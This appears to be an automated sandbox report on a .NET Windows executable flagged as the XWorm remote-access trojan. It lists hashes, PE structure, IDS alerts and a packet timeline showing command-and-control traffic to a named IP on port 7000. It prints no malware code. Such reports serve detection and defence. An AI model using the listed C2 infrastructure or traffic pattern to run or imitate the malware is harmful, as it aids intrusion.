                                                                SHA256:f790a1104f5eec4b7c03064d9063c9e69d1f55e5bce27ad83474fb2aa00310e9
                                                                SHA512:bf3972d2bb7d819e6448651f14e7b465d3a4c92e2ecf747803fbc8e7e9e6cff6b693e972f9729d56fb320316e2e51c751907e99eae42f9309db0241998954877
                                                                SSDEEP:1536:5JVcMJ4tjdLCPwUtdcbwdpmnC6QOvdtvMd5S4Z96:504oBCxtdcbwd9O1RcS4ZE
                                                                TLSH:9794C62F7F52797AC3BD56BF0810B1498978AD229AD9F20B385FF71C6D39D064A05382
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...uD;g............................><... ...@....@.. ....................... ............@................................
                                                                Icon Hash:33d8989292d8d827
                                                                Entrypoint:0x413c3e
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x673B4475 [Mon Nov 18 13:43:17 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x13bec | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x14000 | 0x5abda | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x70000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x11c44 | 0x11e00 | 980f7ab8f1531ec7fff51b3ead31fd69 | False | 0.5830146416083916 | data | 6.093314319391307 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x14000 | 0x5abda | 0x5ac00 | f9a01a8dd066ec89a1da125de87bc9cb | False | 0.0315217157369146 | data | 2.176526481551807 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x70000 | 0xc | 0x200 | aeb523c786010dcdf9d7d6feb41615b6 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x14220 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 262144, resolution 2835 x 2835 px/m | - | - | 0.02073039027132586
RT_ICON | 0x56248 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m | - | - | 0.2632978723404255
RT_ICON | 0x566b0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m | - | - | 0.09398340248962656
RT_ICON | 0x58c58 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m | - | - | 0.15806754221388367
RT_ICON | 0x59d00 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m | - | - | 0.03714657518040932
RT_ICON | 0x6a528 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m | - | - | 0.07345299952763344
RT_GROUP_ICON | 0x6e750 | 0x5a | data | - | - | 0.7111111111111111
RT_VERSION | 0x6e7ac | 0x244 | data | - | - | 0.4724137931034483
RT_MANIFEST | 0x6e9f0 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | - | - | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-29T15:20:14.029990+0100 | 2853192 | ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound | 1 | 192.168.2.7 | 49806 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:15.306150+0100 | 2853191 | ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound | 1 | 103.230.121.124 | 7000 | 192.168.2.7 | 49806 | TCP
2024-11-29T15:20:15.806058+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:15.806058+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:15.926061+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:15.926061+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.046078+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.046078+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.166168+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.166168+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.287698+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.287698+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.408129+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.408129+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.528343+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.528343+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.648418+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.648418+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.888810+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:16.888810+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.009313+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.009313+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.132028+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.132028+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.252230+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.252230+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.376092+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.376092+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.496165+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.496165+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.660928+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.660928+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.781033+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.781033+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.901100+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:17.901100+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.021425+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.021425+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.141579+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.141579+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.262076+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.262076+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.424695+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.424695+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.545159+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.545159+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.665339+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.665339+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.786270+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.786270+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.906505+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.906505+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.966388+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:18.966388+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.086730+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.086730+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.206697+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.206697+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.327415+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.327415+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.447502+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.447502+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.567736+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.567736+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.785059+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.785059+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.905186+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:19.905186+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.025248+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.025248+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.145348+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.145348+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.265461+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.265461+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.381652+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.381652+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.501705+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.501705+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.622209+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.622209+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.696552+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 103.230.121.124 | 7000 | 192.168.2.7 | 49829 | TCP
2024-11-29T15:20:20.696654+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:20.696654+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49829 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:22.535915+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 103.230.121.124 | 7000 | 192.168.2.7 | 49806 | TCP
2024-11-29T15:20:22.539252+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49806 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:28.820631+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 103.230.121.124 | 7000 | 192.168.2.7 | 49806 | TCP
2024-11-29T15:20:28.820631+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 103.230.121.124 | 7000 | 192.168.2.7 | 49806 | TCP
2024-11-29T15:20:35.886539+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.7 | 49806 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:36.482297+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 103.230.121.124 | 7000 | 192.168.2.7 | 49806 | TCP
2024-11-29T15:20:36.485506+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49806 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:50.495112+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 103.230.121.124 | 7000 | 192.168.2.7 | 49806 | TCP
2024-11-29T15:20:50.497403+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49806 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:20:58.830595+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 103.230.121.124 | 7000 | 192.168.2.7 | 49806 | TCP
2024-11-29T15:20:58.830595+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 103.230.121.124 | 7000 | 192.168.2.7 | 49806 | TCP
2024-11-29T15:21:04.426499+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 103.230.121.124 | 7000 | 192.168.2.7 | 49806 | TCP
2024-11-29T15:21:04.428611+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49806 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:19.403961+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 103.230.121.124 | 7000 | 192.168.2.7 | 49806 | TCP
2024-11-29T15:21:19.404980+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49806 | 103.230.121.124 | 7000 | TCP
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Nov 29, 2024 15:19:07.520509958 CET  49699        80         192.168.2.7      208.95.112.1
Nov 29, 2024 15:19:07.641268015 CET  80           49699      208.95.112.1     192.168.2.7
Nov 29, 2024 15:19:07.641506910 CET  49699        80         192.168.2.7      208.95.112.1
Nov 29, 2024 15:19:07.642568111 CET  49699        80         192.168.2.7      208.95.112.1
Nov 29, 2024 15:19:07.762531042 CET  80           49699      208.95.112.1     192.168.2.7
Nov 29, 2024 15:19:08.820662022 CET  80           49699      208.95.112.1     192.168.2.7
Nov 29, 2024 15:19:08.870121002 CET  49699        80         192.168.2.7      208.95.112.1
Nov 29, 2024 15:20:07.819600105 CET  49806        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:07.939563990 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:07.939717054 CET  49806        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:07.981110096 CET  49806        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:08.101178885 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:14.001868963 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:14.029989958 CET  49806        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:14.149975061 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:15.306149960 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:15.306179047 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:15.306190014 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:15.306302071 CET  49806        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:15.306335926 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:15.306346893 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:15.306358099 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:15.306369066 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:15.306389093 CET  49806        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:15.306430101 CET  49806        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:15.306559086 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:15.306571007 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:15.306600094 CET  49806        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:15.314579010 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:15.314639091 CET  49806        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:15.516742945 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:15.516767979 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:15.516870975 CET  49806        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:15.560072899 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:15.680238962 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:15.680325031 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:15.685782909 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:15.805999994 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:15.806057930 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:15.925942898 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:15.926060915 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:16.046024084 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:16.046077967 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:16.166099072 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:16.166167974 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:16.287619114 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:16.287698030 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:16.408025026 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:16.408128977 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:16.528290987 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:16.528342962 CET  49829        7000       192.168.2.7      103.230.121.124
